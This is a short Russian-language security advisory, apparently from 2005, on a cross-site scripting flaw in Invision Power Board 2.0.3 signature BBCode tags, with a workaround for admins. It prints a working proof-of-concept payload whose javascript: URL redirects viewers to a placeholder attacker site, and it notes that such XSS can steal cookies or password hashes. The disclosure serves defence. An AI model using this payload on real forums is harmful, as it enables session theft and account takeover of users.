Обнаружена новая уязвимость в Invision Power Board 2.0.3 : 31 марта 2005 Межсайтовый скриптинг в Invision Power Board Программа: Invision Power Board 2.0.3 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к важным данным других пользователей. Уязвимость существует из-за некорректной обработки входных данных в некоторых BBCode тегах в подписи. Удаленный пользователь может с помощью специально сформированного тега сохранить злонамеренную подпись, которая будет отображаться в каждом сообщении злоумышленника, и выполнить произвольный HTML сценарий в браузере других пользователей. Пример: [COLOR=[IMG=http://server/=`image.jpg]]`style
=background:url("javascript:document.location.replace('http://[attackersite]');") URL производителя: www.invisionboard.com Решение: Способов устранения уязвимости не существует в настоящее время. Админам советую: чтобы как-то защититься от XSS аттак, нужно создать нового юзера с правами Модератора и заходить на форум под этим пользователем (т.е., кто не знает, с помощью XSS можно украсть кукисы (или хеш пароля) любого зарегистрированного юзера, который посмотрит сообщение с XSS кодом!Лучше же если украдут кукисы Модератора, чем Админа ). Ну а если что-то нужно изменить в админке, то заходишь под Админом и делаешь свои дела в Админке . А на форуме сидишь под Модератором.